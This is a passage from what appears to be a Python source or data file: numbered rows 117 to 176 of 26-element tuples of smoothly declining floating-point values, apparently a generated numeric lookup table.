(3.697531777129509, 2.8193220177410643, 3.052837345175329, 3.2224444117776727, 2.8092548736786958, 1.3294220564475412, 1.1999216477895505, 1.0083496325272643, 1.4383651755322937, 0.589917740090813, 0.45917000658821894, 0.2712774348847917, 0.0, 3.76521880194329, 2.9840517837327085, 2.2958500329410945, 1.7697532202724386, 2.8767303510645874, 1.4116894855381699, 1.1999216477895505, 0.9495871831768151, 1.4046274368393479, 1.0741481372592245, 0.6105674690350659, 0.25630200161282407, 0.0), # 117
(3.6857188983940845, 2.804817442898285, 3.0461990193361226, 3.2137431564660996, 2.8037144810308914, 1.3268636672634326, 1.1946048885958631, 1.0059181101450163, 1.4359664146085245, 0.587793559697476, 0.4575959010839617, 0.27047970531244503, 0.0, 3.75731822935161, 2.9752767584368947, 2.287979505419808, 1.7633806790924278, 2.871932829217049, 1.4082853542030227, 1.1946048885958631, 0.9477597623310232, 1.4018572405154457, 1.0712477188220335, 0.6092398038672245, 0.25498340389984414, 0.0), # 118
(3.673818766777897, 2.790499838190801, 3.0395826153685745, 3.2050801839635117, 2.7980877294237922, 1.324350462920061, 1.1893615916301512, 1.0035944116360243, 1.433621322339339, 0.5857026088260373, 0.45604817905045525, 0.26968938552071453, 0.0, 3.749329068691973, 2.9665832407278594, 2.2802408952522764, 1.7571078264781117, 2.867242644678678, 1.405032176290434, 1.1893615916301512, 0.9459646163714721, 1.3990438647118961, 1.0683600613211708, 0.607916523073715, 0.253681803471891, 0.0), # 119
(3.6618168359700647, 2.776347063197458, 3.0329749961642545, 3.196439599088218, 2.792366585855599, 1.3218760025228253, 1.1841826625980507, 1.0013707969665573, 1.4313233252716744, 0.5836407016375906, 0.4545236072994945, 0.2689049431644433, 0.0, 3.741239202529039, 2.9579543748088755, 2.272618036497472, 1.7509221049127714, 2.8626466505433488, 1.40191911575318, 1.1841826625980507, 0.9441971446591609, 1.3961832929277995, 1.0654798663627396, 0.6065949992328509, 0.25239518756340534, 0.0), # 120
(3.6496985596597074, 2.762336977497104, 3.0263630246147293, 3.1878055066585302, 2.7865430173245116, 1.319433845177124, 1.179059007205196, 0.9992395261028846, 1.4290658499524664, 0.5816036522932297, 0.4530189526428745, 0.26812484589847413, 0.0, 3.7330365134274643, 2.9493733048832147, 2.265094763214372, 1.744810956879689, 2.858131699904933, 1.3989353365440385, 1.179059007205196, 0.9424527465550885, 1.3932715086622558, 1.0626018355528437, 0.6052726049229459, 0.2511215434088277, 0.0), # 121
(3.6374493915359416, 2.7484474406685857, 3.0197335636115703, 3.179162011492757, 2.780608990828729, 1.3170175499883545, 1.1739815311572235, 0.9971928590112749, 1.4268423229286518, 0.5795872749540478, 0.45153098189239016, 0.2673475613776501, 0.0, 3.7247088839519082, 2.9408231751541503, 2.2576549094619507, 1.7387618248621433, 2.8536846458573035, 1.3960700026157848, 1.1739815311572235, 0.9407268214202532, 1.3903044954143644, 1.059720670497586, 0.6039467127223141, 0.24985885824259874, 0.0), # 122
(3.6250547852878876, 2.7346563122907503, 3.013073476046346, 3.1704932184092085, 2.774556473366451, 1.314620676061916, 1.1689411401597678, 0.9952230556579972, 1.4246461707471672, 0.5775873837811388, 0.4500564618598364, 0.2665715572568141, 0.0, 3.716244196667029, 2.9322871298249544, 2.2502823092991817, 1.7327621513434162, 2.8492923414943343, 1.3933122779211962, 1.1689411401597678, 0.9390147686156541, 1.3872782366832255, 1.0568310728030696, 0.6026146952092691, 0.24860511929915918, 0.0), # 123
(3.612500194604662, 2.7209414519424455, 3.0063696248106235, 3.1617832322261963, 2.7683774319358765, 1.312236782503206, 1.163928739918464, 0.9933223760093212, 1.4224708199549485, 0.5755997929355963, 0.448592159357008, 0.26579530119080924, 0.0, 3.7076303341374848, 2.923748313098901, 2.2429607967850402, 1.7267993788067884, 2.844941639909897, 1.3906513264130496, 1.163928739918464, 0.93731198750229, 1.3841887159679382, 1.053927744075399, 0.6012739249621247, 0.24735831381294962, 0.0), # 124
(3.5997710731753836, 2.7072807192025174, 2.999608872795975, 3.1530161577620284, 2.7620638335352057, 1.309859428417623, 1.1589352361389478, 0.9914830800315152, 1.4203096970989324, 0.5736203165785135, 0.4471348411957002, 0.26501726083447835, 0.0, 3.6988551789279316, 2.9151898691792613, 2.235674205978501, 1.7208609497355403, 2.840619394197865, 1.3880763120441213, 1.1589352361389478, 0.9356138774411593, 1.3810319167676028, 1.0510053859206763, 0.599921774559195, 0.24611642901841072, 0.0), # 125
(3.5868528746891712, 2.6936519736498146, 2.9927780828939663, 3.1441760998350166, 2.755607645162638, 1.307482172910566, 1.153951534526854, 0.9896974276908488, 1.4181562287260556, 0.5716447688709844, 0.44568127418770764, 0.26423590384266454, 0.0, 3.6899066136030316, 2.9065949422693094, 2.2284063709385378, 1.7149343066129528, 2.8363124574521112, 1.3855763987671883, 1.153951534526854, 0.9339158377932613, 1.377803822581319, 1.0480586999450057, 0.5985556165787933, 0.2448774521499832, 0.0), # 126
(3.5737310528351447, 2.680033074863182, 2.9858641179961682, 3.13524716326347, 2.749000833816373, 1.305098575087432, 1.1489685407878187, 0.987957678953591, 1.416003841383254, 0.5696689639741025, 0.44422822514482535, 0.2634496978702106, 0.0, 3.6807725207274395, 2.897946676572316, 2.2211411257241265, 1.7090068919223071, 2.832007682766508, 1.3831407505350275, 1.1489685407878187, 0.9322132679195942, 1.3745004169081865, 1.0450823877544901, 0.5971728235992337, 0.2436393704421075, 0.0), # 127
(3.5603910613024183, 2.6664018824214697, 2.9788538409941503, 3.1262134528656995, 2.7422353664946106, 1.3027021940536203, 1.1439771606274765, 0.9862560937860104, 1.4138459616174646, 0.5676887160489614, 0.44277246087884836, 0.2626571105719597, 0.0, 3.671440782865815, 2.8892282162915555, 2.2138623043942416, 1.7030661481468838, 2.827691923234929, 1.3807585313004147, 1.1439771606274765, 0.9305015671811573, 1.3711176832473053, 1.0420711509552334, 0.5957707681988301, 0.24240017112922455, 0.0), # 128
(3.546818353780113, 2.652736255903522, 2.9717341147794802, 3.1170590734600148, 2.73530321019555, 1.300286588914529, 1.1389682997514627, 0.9845849321543767, 1.4116760159756234, 0.5656998392566547, 0.4413107482015715, 0.2618566096027546, 0.0, 3.6618992825828154, 2.8804227056303, 2.2065537410078573, 1.6970995177699637, 2.823352031951247, 1.3784189050161275, 1.1389682997514627, 0.9287761349389492, 1.367651605097775, 1.0390196911533385, 0.594346822955896, 0.24115784144577473, 0.0), # 129
(3.532998383957347, 2.6390140548881877, 2.9644918022437268, 3.107768129864726, 2.72819633191739, 1.2978453187755554, 1.1339328638654125, 0.9829364540249584, 1.4094874310046666, 0.5636981477582759, 0.4398398539247897, 0.2610466626174385, 0.0, 3.6521359024430993, 2.8715132887918227, 2.199199269623948, 1.6910944432748272, 2.818974862009333, 1.3761110356349417, 1.1339328638654125, 0.9270323705539681, 1.364098165958695, 1.0359227099549089, 0.5928983604487453, 0.2399103686261989, 0.0), # 130
(3.5189166055232377, 2.625213138954313, 2.9571137662784603, 3.098324726898143, 2.7209066986583315, 1.295371942742099, 1.1288617586749619, 0.9813029193640249, 1.4072736332515314, 0.5616794557149186, 0.43835654486029796, 0.2602257372708542, 0.0, 3.6421385250113247, 2.8624831099793955, 2.1917827243014893, 1.6850383671447555, 2.814547266503063, 1.373824087109635, 1.1288617586749619, 0.9252656733872135, 1.3604533493291657, 1.0327749089660478, 0.5914227532556922, 0.2386557399049376, 0.0), # 131
(3.504558472166904, 2.611311367680746, 2.9495868697752488, 3.0887129693785758, 2.7134262774165743, 1.2928600199195572, 1.123745889885745, 0.9796765881378455, 1.4050280492631537, 0.5596395772876765, 0.43685758781989104, 0.2593923012178448, 0.0, 3.6318950328521504, 2.853315313396292, 2.184287939099455, 1.6789187318630292, 2.8100560985263074, 1.3715472233929837, 1.123745889885745, 0.9234714427996837, 1.3567131387082871, 1.0295709897928589, 0.5899173739550498, 0.2373919425164315, 0.0), # 132
(3.4899094375774653, 2.5972866006463327, 2.9418979756256616, 3.0789169621243357, 2.705747035190316, 1.2903031094133288, 1.118576163203398, 0.9780497203126887, 1.40274410558647, 0.5575743266376434, 0.43533974961536415, 0.25854482211325314, 0.0, 3.6213933085302346, 2.843993043245784, 2.1766987480768205, 1.6727229799129297, 2.80548821117294, 1.3692696084377642, 1.118576163203398, 0.9216450781523777, 1.352873517595158, 1.0263056540414455, 0.5883795951251324, 0.2361169636951212, 0.0), # 133
(3.474954955444038, 2.583116697429922, 2.934033946721268, 3.068920809953731, 2.697860938977758, 1.287694770328812, 1.1133434843335557, 0.9764145758548239, 1.4004152287684173, 0.5554795179259124, 0.43379979705851196, 0.25768176761192224, 0.0, 3.6106212346102335, 2.8344994437311444, 2.1689989852925597, 1.6664385537777369, 2.8008304575368346, 1.3669804061967537, 1.1133434843335557, 0.9197819788062943, 1.348930469488879, 1.0229736033179107, 0.5868067893442537, 0.23482879067544749, 0.0), # 134
(3.4596804794557414, 2.5687795176103587, 2.9259816459536365, 3.058708617685074, 2.689759955777099, 1.285028561771405, 1.1080387589818537, 0.9747634147305201, 1.3980348453559306, 0.5533509653135777, 0.4322344969611296, 0.2568016053686951, 0.0, 3.599566693656808, 2.824817659055646, 2.1611724848056477, 1.660052895940733, 2.796069690711861, 1.3646687806227282, 1.1080387589818537, 0.917877544122432, 1.3448799778885494, 1.0195695392283581, 0.5851963291907273, 0.23352541069185084, 0.0), # 135
(3.444071463301694, 2.554252920766492, 2.9177279362143365, 3.0482644901366713, 2.681436052586538, 1.282298042846506, 1.102652892853927, 0.9730884969060463, 1.3955963818959474, 0.5511844829617324, 0.43064061613501187, 0.2559028030384148, 0.0, 3.5882175682346147, 2.814930833422562, 2.153203080675059, 1.6535534488851968, 2.7911927637918947, 1.362323895668465, 1.102652892853927, 0.9159271734617901, 1.340718026293269, 1.0160881633788907, 0.5835455872428673, 0.23220481097877202, 0.0), # 136
(3.4281133606710137, 2.5395147664771676, 2.9092596803949373, 3.0375725321268376, 2.6728811964042754, 1.279496772659513, 1.0971767916554112, 0.9713820823476715, 1.3930932649354042, 0.5489758850314703, 0.42901492139195374, 0.25498382827592403, 0.0, 3.5765617409083106, 2.804822111035164, 2.145074606959769, 1.6469276550944105, 2.7861865298708084, 1.3599349152867402, 1.0971767916554112, 0.9139262661853664, 1.3364405982021377, 1.0125241773756128, 0.5818519360789874, 0.23086497877065162, 0.0), # 137
(3.4117916252528193, 2.5245429143212332, 2.900563741387006, 3.0266168484738794, 2.6640873542285117, 1.2766183103158248, 1.0916013610919408, 0.9696364310216651, 1.3905189210212374, 0.5467209856838848, 0.4273541795437502, 0.254043148736066, 0.0, 3.5645870942425564, 2.794474636096725, 2.136770897718751, 1.640162957051654, 2.781037842042475, 1.3574910034303311, 1.0916013610919408, 0.9118702216541607, 1.3320436771142559, 1.0088722828246266, 0.5801127482774012, 0.22950390130193032, 0.0), # 138
(3.3950917107362275, 2.509315223877536, 2.8916269820821134, 3.015381543996108, 2.6550464930574442, 1.2736562149208395, 1.085917506869152, 0.9678438028942958, 1.387866776700383, 0.5444155990800699, 0.4256551574021961, 0.2530792320736836, 0.0, 3.5522815108020076, 2.7838715528105187, 2.1282757870109803, 1.6332467972402092, 2.775733553400766, 1.354981324052014, 1.085917506869152, 0.9097544392291711, 1.3275232465287221, 1.0051271813320362, 0.5783253964164228, 0.22811956580704876, 0.0), # 139
(3.3779990708103593, 2.4938095547249226, 2.882436265371829, 3.0038507235118335, 2.6457505798892744, 1.2706040455799552, 1.0801161346926793, 0.9659964579318328, 1.3851302585197776, 0.5420555393811187, 0.42391462177908634, 0.25209054594361974, 0.0, 3.539632873151326, 2.7729960053798166, 2.1195731088954313, 1.6261666181433558, 2.770260517039555, 1.352395041104566, 1.0801161346926793, 0.9075743182713966, 1.3228752899446372, 1.0012835745039448, 0.5764872530743659, 0.22670995952044753, 0.0), # 140
(3.3604991591643323, 2.478003766442241, 2.8729784541477206, 2.992008491839366, 2.636191581722201, 1.2674553613985702, 1.074188150268159, 0.9640866561005451, 1.3823027930263572, 0.5396366207481252, 0.422129339486216, 0.2510755580007175, 0.0, 3.5266290638551654, 2.761831138007892, 2.1106466974310796, 1.6189098622443754, 2.7646055860527143, 1.3497213185407633, 1.074188150268159, 0.9053252581418358, 1.3180957908611004, 0.9973361639464555, 0.5745956908295441, 0.2252730696765674, 0.0), # 141
(3.3425774294872626, 2.4618757186083373, 2.863240411301357, 2.9798389537970165, 2.626361465554423, 1.2642037214820832, 1.0681244593012253, 0.962106657366702, 1.3793778067670588, 0.5371546573421829, 0.4202960773353799, 0.25003273589981984, 0.0, 3.5132579654781866, 2.750360094898018, 2.101480386676899, 1.6114639720265485, 2.7587556135341176, 1.3469493203133829, 1.0681244593012253, 0.903002658201488, 1.3131807327772116, 0.9932796512656723, 0.5726480822602714, 0.2238068835098489, 0.0), # 142
(3.32421933546827, 2.4454032708020597, 2.8532089997243086, 2.9673262142030925, 2.616252198384141, 1.2608426849358916, 1.0619159674975138, 0.960048721696572, 1.3763487262888197, 0.5346054633243854, 0.4184116021383729, 0.2489605472957697, 0.0, 3.499507460585047, 2.738566020253466, 2.0920580106918645, 1.603816389973156, 2.7526974525776393, 1.3440682103752009, 1.0619159674975138, 0.9006019178113511, 1.3081260991920705, 0.9891087380676977, 0.5706417999448617, 0.22230938825473273, 0.0), # 143
(3.305410330796474, 2.4285642826022547, 2.8428710823081427, 2.954454377875907, 2.6058557472095543, 1.2573658108653942, 1.0555535805626597, 0.9579051090564249, 1.3732089781385746, 0.5319848528558261, 0.4164726807069901, 0.24785745984341, 0.0, 3.485365431740406, 2.7264320582775095, 2.0823634035349503, 1.595954558567478, 2.746417956277149, 1.3410671526789948, 1.0555535805626597, 0.8981184363324245, 1.3029278736047771, 0.9848181259586359, 0.5685742164616286, 0.22077857114565957, 0.0), # 144
(3.286135869160991, 2.41133661358777, 2.8322135219444298, 2.9412075496337686, 2.595164079028862, 1.2537666583759894, 1.0490282042022987, 0.9556680794125294, 1.3699519888632605, 0.5292886400975989, 0.41447607985302637, 0.24672194119758384, 0.0, 3.47081976150892, 2.7139413531734218, 2.072380399265132, 1.5878659202927965, 2.739903977726521, 1.3379353111775412, 1.0490282042022987, 0.8955476131257067, 1.297582039514431, 0.9804025165445898, 0.566442704388886, 0.21921241941707004, 0.0), # 145
(3.2663814042509403, 2.393698123337452, 2.821223181524739, 2.927569834294988, 2.584169160840265, 1.2500387865730758, 1.042330744122066, 0.9533298927311545, 1.3665711850098141, 0.5265126392107972, 0.4124185663882766, 0.24555245901313405, 0.0, 3.4558583324552474, 2.701077049144474, 2.062092831941383, 1.5795379176323912, 2.7331423700196282, 1.3346618498236165, 1.042330744122066, 0.8928848475521969, 1.2920845804201324, 0.9758566114316628, 0.5642446363049479, 0.21760892030340476, 0.0), # 146
(3.24613238975544, 2.375626671430148, 2.8098869239406365, 2.913525336677874, 2.5728629596419603, 1.2461757545620502, 1.0354521060275963, 0.9508828089785692, 1.3630599931251721, 0.5236526643565147, 0.4102969071245358, 0.24434748094490372, 0.0, 3.4404690271440472, 2.6878222903939406, 2.051484535622679, 1.5709579930695439, 2.7261199862503442, 1.331235932569997, 1.0354521060275963, 0.8901255389728929, 1.2864314798209802, 0.9711751122259582, 0.5619773847881274, 0.21596606103910437, 0.0), # 147
(3.2253742793636087, 2.3571001174447055, 2.7981916120836945, 2.899058161600739, 2.56123744243215, 1.2421711214483127, 1.0283831956245253, 0.9483190881210429, 1.3594118397562704, 0.5207045296958448, 0.4081078688735989, 0.24310547464773571, 0.0, 3.4246397281399767, 2.6741602211250926, 2.0405393443679944, 1.562113589087534, 2.718823679512541, 1.3276467233694602, 1.0283831956245253, 0.8872650867487947, 1.280618721216075, 0.9663527205335799, 0.5596383224167389, 0.21428182885860964, 0.0), # 148
(3.204092526764565, 2.338096320959971, 2.7861241088454816, 2.884152413881891, 2.549284576209032, 1.2380184463372599, 1.0211149186184882, 0.9456309901248444, 1.355620151450045, 0.5176640493898814, 0.40584821844726066, 0.24182490777647309, 0.0, 3.408358318007695, 2.6600739855412034, 2.0292410922363033, 1.5529921481696438, 2.71124030290009, 1.3238833861747823, 1.0211149186184882, 0.8842988902408999, 1.274642288104516, 0.9613841379606305, 0.5572248217690964, 0.21255421099636107, 0.0), # 149
(3.182272585647426, 2.3185931415547922, 2.773671277117565, 2.8687921983396416, 2.5369963279708068, 1.2337112883342916, 1.0136381807151202, 0.9428107749562428, 1.3516783547534337, 0.5145270375997177, 0.40351472265731625, 0.24050424798595882, 0.0, 3.3916126793118586, 2.6455467278455465, 2.017573613286581, 1.5435811127991528, 2.7033567095068674, 1.31993508493874, 1.0136381807151202, 0.8812223488102082, 1.2684981639854034, 0.956264066113214, 0.5547342554235131, 0.21078119468679934, 0.0), # 150
(3.15989990970131, 2.2985684388080165, 2.7608199797915143, 2.852961619792299, 2.524364664715674, 1.2292432065448047, 1.0059438876200566, 0.9398507025815073, 1.347579876213372, 0.5112893084864479, 0.40110414831556035, 0.23914196293103576, 0.0, 3.3743906946171274, 2.630561592241393, 2.0055207415778016, 1.5338679254593435, 2.695159752426744, 1.3157909836141102, 1.0059438876200566, 0.8780308618177176, 1.262182332357837, 0.9509872065974332, 0.5521639959583029, 0.20896076716436518, 0.0), # 151
(3.1369599526153373, 2.27800007229849, 2.747557079758901, 2.836644783058176, 2.5113815534418316, 1.2246077600741982, 0.998022945038933, 0.9367430329669069, 1.343318142376796, 0.5079466762111651, 0.3986132622337882, 0.237736520266547, 0.0, 3.356680246488159, 2.6151017229320166, 1.9930663111689406, 1.523840028633495, 2.686636284753592, 1.3114402461536696, 0.998022945038933, 0.8747198286244273, 1.2556907767209158, 0.9455482610193922, 0.5495114159517802, 0.2070909156634991, 0.0), # 152
(3.1134381680786243, 2.2568659016050607, 2.7338694399112895, 2.81982579295558, 2.4980389611474814, 1.2197985080278704, 0.9898662586773839, 0.9334800260787104, 1.338886579790643, 0.504494954934963, 0.39603883122379446, 0.2362863876473355, 0.0, 3.338469217489611, 2.59915026412069, 1.9801941561189722, 1.5134848648048886, 2.677773159581286, 1.3068720365101947, 0.9898662586773839, 0.871284648591336, 1.2490194805737407, 0.9399419309851935, 0.546773887982258, 0.20516962741864192, 0.0), # 153
(3.0893200097802915, 2.2351437863065757, 2.719743923140253, 2.802488754302823, 2.4843288548308213, 1.2148090095112194, 0.9814647342410456, 0.9300539418831871, 1.3342786150018489, 0.5009299588189354, 0.3933776220973742, 0.2347900327282442, 0.0, 3.319745490186143, 2.5826903600106856, 1.9668881104868707, 1.502789876456806, 2.6685572300036977, 1.302075518636462, 0.9814647342410456, 0.8677207210794424, 1.2421644274154107, 0.9341629181009412, 0.5439487846280506, 0.20319488966423419, 0.0), # 154
(3.0645909314094544, 2.212811585981881, 2.705167392337359, 2.7846177719182137, 2.470243201490052, 1.2096328236296434, 0.9728092774355522, 0.926457040346606, 1.3294876745573503, 0.49724750202417556, 0.39062640166632223, 0.2332459231641161, 0.0, 3.3004969471424106, 2.565705154805277, 1.953132008331611, 1.4917425060725265, 2.6589753491147006, 1.2970398564852486, 0.9728092774355522, 0.8640234454497453, 1.235121600745026, 0.928205923972738, 0.5410334784674719, 0.2011646896347165, 0.0), # 155
(3.0392363866552325, 2.1898471602098257, 2.6901267103941757, 2.7661969506200625, 2.455773968123373, 1.204263509488541, 0.96389079396654, 0.9226815814352365, 1.3245071850040835, 0.4934433987117774, 0.38778193674243366, 0.23165252660979413, 0.0, 3.280711470923074, 2.548177792707735, 1.9389096837121682, 1.480330196135332, 2.649014370008167, 1.2917542140093312, 0.96389079396654, 0.8601882210632436, 1.2278869840616864, 0.9220656502066877, 0.5380253420788351, 0.19907701456452961, 0.0), # 156
(3.013241829206745, 2.1662283685692554, 2.674608740202273, 2.7472103952266815, 2.4409131217289826, 1.19869462619331, 0.9547001895396439, 0.9187198251153471, 1.319330572888985, 0.4895134630428343, 0.38484099413750333, 0.2300083107201213, 0.0, 3.2603769440927906, 2.5300914179213336, 1.9242049706875164, 1.4685403891285025, 2.63866114577797, 1.2862077551614859, 0.9547001895396439, 0.8562104472809356, 1.2204565608644913, 0.915736798408894, 0.5349217480404546, 0.19692985168811414, 0.0), # 157
(2.985872378562096, 2.141499477616495, 2.6578639846341185, 2.7269308744953733, 2.424981628232266, 1.1925723778073256, 0.9450213441855715, 0.9142994920582287, 1.3135549455465463, 0.48533659162911447, 0.38170638350259617, 0.22825331880647803, 0.0, 3.238594343766138, 2.510786506871258, 1.908531917512981, 1.456009774887343, 2.6271098910930926, 1.2800192888815203, 0.9450213441855715, 0.8518374127195183, 1.212490814116133, 0.9089769581651246, 0.5315727969268238, 0.19468177069240863, 0.0), # 158
(2.9529147067913613, 2.1131239505198085, 2.635579272800996, 2.7011931476365363, 2.4040510159417674, 1.1838609178683244, 0.9336425526771432, 0.9078689221273971, 1.3048569681629525, 0.48022809940987465, 0.37782779570793296, 0.22604541745610365, 0.0, 3.210171058768078, 2.48649959201714, 1.8891389785396648, 1.4406842982296237, 2.609713936325905, 1.271016490978356, 0.9336425526771432, 0.8456149413345173, 1.2020255079708837, 0.9003977158788457, 0.5271158545601993, 0.1921021773199826, 0.0), # 159
(2.913948837961724, 2.0808688004649283, 2.6073069859852964, 2.669573253122658, 2.3777120350258123, 1.1723463024111265, 0.9204487496767568, 0.8992665315878912, 1.2929900302971533, 0.4741205651862895, 0.3731506339073027, 0.22335006496292825, 0.0, 3.1745682435574323, 2.4568507145922105, 1.8657531695365135, 1.422361695558868, 2.5859800605943066, 1.2589731442230476, 0.9204487496767568, 0.8373902160079474, 1.1888560175129061, 0.8898577510408863, 0.5214613971970593, 0.18916989095135714, 0.0), # 160
(2.869288821834384, 2.0449443182961717, 2.5733489906367697, 2.6323717511270184, 2.34623816647523, 1.1581680230330733, 0.9055362892013753, 0.8886000888516301, 1.278110635599869, 0.4670658193170939, 0.3677161103066472, 0.22019224896358572, 0.0, 3.132149617927639, 2.4221147385994426, 1.8385805515332359, 1.4011974579512814, 2.556221271199738, 1.2440401243922823, 0.9055362892013753, 0.8272628735950524, 1.173119083237615, 0.877457250375673, 0.514669798127354, 0.18590402893601563, 0.0), # 161
(2.8192487081705426, 2.005560794857854, 2.5340071532051653, 2.5898892018228983, 2.3099028912808546, 1.1414655713315065, 0.8890015252679618, 0.8759773623305338, 1.2603752877218182, 0.45911569216102327, 0.3615654371119081, 0.21659695709470983, 0.0, 3.0832789016721334, 2.382566528041808, 1.8078271855595405, 1.3773470764830695, 2.5207505754436363, 1.2263683072627474, 0.8890015252679618, 0.815332550951076, 1.1549514456404273, 0.8632964006076329, 0.5068014306410331, 0.18232370862344133, 0.0), # 162
(2.7641425467313994, 1.9629285209942922, 2.4895833401402343, 2.5424261653835805, 2.268979690433517, 1.122378438903767, 0.8709408118934802, 0.8615061204365209, 1.2399404903137208, 0.4503220140768126, 0.35473982652902725, 0.21258917699293448, 0.0, 3.0283198145843517, 2.338480946922279, 1.7736991326451361, 1.3509660422304375, 2.4798809806274416, 1.2061085686111293, 0.8709408118934802, 0.8016988849312622, 1.1344898452167584, 0.8474753884611936, 0.4979166680280469, 0.1784480473631175, 0.0), # 163
(2.704284387278154, 1.917257787549801, 2.4403794178917257, 2.4902832019823453, 2.2237420449240504, 1.1010461173471968, 0.8514505030948932, 0.8452941315815116, 1.2169627470262965, 0.440736615423197, 0.34728049076394646, 0.20819389629489346, 0.0, 2.9676360764577314, 2.290132859243828, 1.736402453819732, 1.3222098462695906, 2.433925494052593, 1.1834117842141163, 0.8514505030948932, 0.7864615123908549, 1.1118710224620252, 0.830094400660782, 0.4880758835783452, 0.17429616250452737, 0.0), # 164
(2.639988279572007, 1.8687588853686983, 2.3866972529093897, 2.433760871792476, 2.174463435743286, 1.077608098259137, 0.8306269528891644, 0.8274491641774244, 1.191598561510264, 0.43041132655891146, 0.3392286420226075, 0.2034361026372207, 0.0, 2.901591407085708, 2.237797129009427, 1.6961432101130374, 1.291233979676734, 2.383197123020528, 1.1584288298483942, 0.8306269528891644, 0.7697200701850978, 1.087231717871643, 0.8112536239308255, 0.477339450581878, 0.16988717139715442, 0.0), # 165
(2.571568273374159, 1.8176421052952998, 2.3288387116429763, 2.3731597349872504, 2.121417343882057, 1.0522038732369288, 0.8085665152932573, 0.8080789866361796, 1.164004437416343, 0.41939797784269134, 0.330625492510952, 0.19834078365655008, 0.0, 2.830549526261718, 2.1817486202220504, 1.6531274625547598, 1.2581939335280736, 2.328008874832686, 1.1313105812906514, 0.8085665152932573, 0.7515741951692348, 1.0607086719410286, 0.7910532449957504, 0.4657677423285953, 0.16524019139048182, 0.0), # 166
(2.4993384184458094, 1.764117738173922, 2.267105660542235, 2.308780351739953, 2.0648772503311945, 1.0249729338779137, 0.785365544324135, 0.7872913673696962, 1.1343368783952532, 0.40774839963327153, 0.3215122544349219, 0.1929329269895153, 0.0, 2.7548741537791983, 2.122262196884668, 1.607561272174609, 1.2232451988998143, 2.2686737567905064, 1.1022079143175747, 0.785365544324135, 0.7321235241985098, 1.0324386251655973, 0.7695934505799846, 0.45342113210844703, 0.16037433983399293, 0.0), # 167
(2.4236127645481584, 1.7083960748488805, 2.201799966056916, 2.240923282223864, 2.005116636081531, 0.9960547717794331, 0.7611203939987609, 0.7651940747898933, 1.102752388097714, 0.3955144222893873, 0.31193014000045877, 0.1872375202727504, 0.0, 2.674929009431585, 2.0596127230002543, 1.5596507000022939, 1.1865432668681617, 2.205504776195428, 1.0712717047058506, 0.7611203939987609, 0.7114676941281666, 1.0025583180407656, 0.7469744274079547, 0.4403599932113833, 0.15530873407717097, 0.0), # 168
(2.344705361442406, 1.6506874061644923, 2.13322349463677, 2.169889086612265, 1.9424089821238986, 0.9655888785388289, 0.7359274183340984, 0.7418948773086909, 1.0694074701744452, 0.3827478761697738, 0.3019203614135046, 0.1812795511428891, 0.0, 2.591077813012314, 1.9940750625717798, 1.509601807067523, 1.148243628509321, 2.1388149403488903, 1.0386528282321672, 0.7359274183340984, 0.6897063418134491, 0.9712044910619493, 0.7232963622040884, 0.426644698927354, 0.15006249146949932, 0.0), # 169
(2.2629302588897535, 1.5912020229650736, 2.061678112731545, 2.095978325078436, 1.8770277694491289, 0.9337147457534416, 0.7098829713471106, 0.717501543338008, 1.0344586282761652, 0.36950059163316584, 0.2915241308800011, 0.1750840072365653, 0.0, 2.503684284314822, 1.9259240796022181, 1.4576206544000057, 1.1085017748994974, 2.0689172565523304, 1.0045021606732112, 0.7098829713471106, 0.6669391041096011, 0.9385138847245644, 0.6986594416928121, 0.412335622546309, 0.14465472936046128, 0.0), # 170
(2.1786015066514, 1.53015021609494, 1.9874656867909928, 2.0194915577956607, 1.809246479048055, 0.900571865020613, 0.6830834070547611, 0.6921218412897638, 0.9980623660535942, 0.35582439903829893, 0.2807826606058899, 0.16867587619041288, 0.0, 2.413112143132546, 1.8554346380945415, 1.4039133030294495, 1.0674731971148965, 1.9961247321071884, 0.9689705778056694, 0.6830834070547611, 0.6432656178718664, 0.9046232395240275, 0.6731638525985537, 0.3974931373581986, 0.13910456509954003, 0.0), # 171
(2.092033154488546, 1.4677422763984087, 1.9108880832648623, 1.940729344937219, 1.7393385919115076, 0.8662997279376846, 0.6556250794740132, 0.6658635395758785, 0.9603751871574514, 0.3417711287439081, 0.26973716279711296, 0.16208014564106574, 0.0, 2.3197251092589215, 1.7828816020517226, 1.3486858139855649, 1.025313386231724, 1.9207503743149028, 0.9322089554062299, 0.6556250794740132, 0.618785519955489, 0.8696692959557538, 0.6469097816457398, 0.3821776166529725, 0.13343111603621902, 0.0), # 172
(2.003539252162392, 1.4041884947197956, 1.832247168602904, 1.8599922466763927, 1.6675775890303204, 0.8310378261019976, 0.62760434262183, 0.6388344066082706, 0.9215535952384564, 0.32739261110872825, 0.25842884965961194, 0.1553218032251575, 0.0, 2.223886902487385, 1.7085398354767325, 1.2921442482980594, 0.9821778333261846, 1.8431071904769127, 0.8943681692515789, 0.62760434262183, 0.5935984472157125, 0.8337887945151602, 0.6199974155587977, 0.36644943372058086, 0.12765349951998142, 0.0), # 173
(1.9134338494341376, 1.3396991619034166, 1.7518448092548675, 1.7775808231864623, 1.5942369513953243, 0.7949256511108933, 0.5991175505151751, 0.6111422107988601, 0.8817540939473285, 0.31274067649149473, 0.24689893339932856, 0.1484258365793223, 0.0, 2.1259612426113734, 1.632684202372545, 1.2344946669966426, 0.9382220294744841, 1.763508187894657, 0.8555990951184042, 0.5991175505151751, 0.5678040365077809, 0.7971184756976621, 0.5925269410621542, 0.3503689618509735, 0.12179083290031062, 0.0), # 174
(1.8220309960649823, 1.274484568793588, 1.6699828716705027, 1.6937956346407104, 1.5195901599973516, 0.7581026945617134, 0.5702610571710116, 0.582894720559566, 0.8411331869347874, 0.2978671552509425, 0.23518862622220466, 0.14141723334019382, 0.0, 2.026311849424323, 1.5555895667421318, 1.1759431311110233, 0.8936014657528273, 1.682266373869575, 0.8160526087833925, 0.5702610571710116, 0.5415019246869381, 0.7597950799986758, 0.5645985448802369, 0.33399657433410057, 0.11586223352668984, 0.0), # 175
(1.7296447418161276, 1.2087550062346268, 1.5869632222995596, 1.6089372412124177, 1.4439106958272347, 0.720708448051799, 0.541131216606303, 0.5541997043023082, 0.7998473778515522, 0.28282387774580675, 0.22333914033418203, 0.134320981144406, 0.0, 1.9253024427196697, 1.4775307925884658, 1.11669570167091, 0.84847163323742, 1.5996947557031045, 0.7758795860232315, 0.541131216606303, 0.5147917486084279, 0.7219553479136174, 0.5363124137374726, 0.31739264445991194, 0.10988681874860246, 0.0), # 176
